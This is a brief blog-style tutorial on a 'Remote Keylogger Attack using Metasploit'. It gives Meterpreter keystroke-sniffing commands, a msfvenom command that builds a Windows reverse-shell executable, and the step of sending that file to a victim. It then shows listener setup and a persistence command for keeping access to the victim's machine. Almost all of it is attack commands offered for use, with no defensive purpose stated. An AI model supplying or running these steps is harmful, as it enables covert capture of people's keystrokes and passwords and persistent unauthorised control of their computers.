Hello Friends, Today Topic Remote Keylogger Attack using Metasploit
Remote Keylogger Commands
Meterpreter >keyscan_start
Starting keystroke sniffer
Meterpreter >keyscan_stop
Stoping keystroke sniffer
Meterpreter >keyscan_dump
Dumping keystrokes
Meterpreter >keyboard_send
Now create payload
Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe![Remote Keylogger Attack using Metasploit Remote Keylogger Attack using Metasploit](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKBgaJ-XNSpJxplukruHeFiCeiTVro413KxQpW_x9M90H47w8JDu-CLT2Wa6qB4ZgdwVowsruUF6LqRzBU6ufK25HfVKfoJiw8lZQSYRXDaFfVUxshz0-bONSwHuyDE9vfyX-r5tcft6jn/s640-rw/Screenshot+%2528191%2529.png)
- Run this command and wait for 2 mints.
- Now payload was created
- open your [ Metasploit-framework/bin/ ] Folder check your exe file
- Now send the exe file to victi
Now Open Metasploit Framework
- Open command prompt in this path [ Metasploit-framework/bin/ ]
- msfconsole (if not work give this command msfconsole.bat )
- Now Metasploit framework opened
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set LHOST yourip
- set LPORT portnumber
- exploit
- Now started reverse tcp handler : 4444
Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )
- Now Meterpreter session opened
- Type "help" command to know all commands
- sysinfo and more commands.
Persistence Attack
![Remote Keylogger Attack using Metasploit Remote Keylogger Attack using Metasploit](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWZ82MihP3lgxlzRfHZedmho7VJ-67wMpn32ldLwP3FO5Do8c0-6LKxchdHss26881HxUQi99jisb_94ggx5iBWSl_CdMR9QZhOYHIzr_zZcFq3z4dP2Yvzy6lAOgjmDXg-SUJha4B1q-O/s640-rw/Screenshot+%2528193%2529.png)
- run persistence -h
- now it can show how to use commands
- run persistence -U -i 20 -p portnumber -r yourip
- Eg : run persistence -U -i 20 -p 4444 -r 123.323.4.241
- hit enter to run the command
- now it can automatically inject the persistence payload into victim system
- Then any time you access the victim system
Remote Keylogger Attack using Metasploit
Thankyou
0 Comments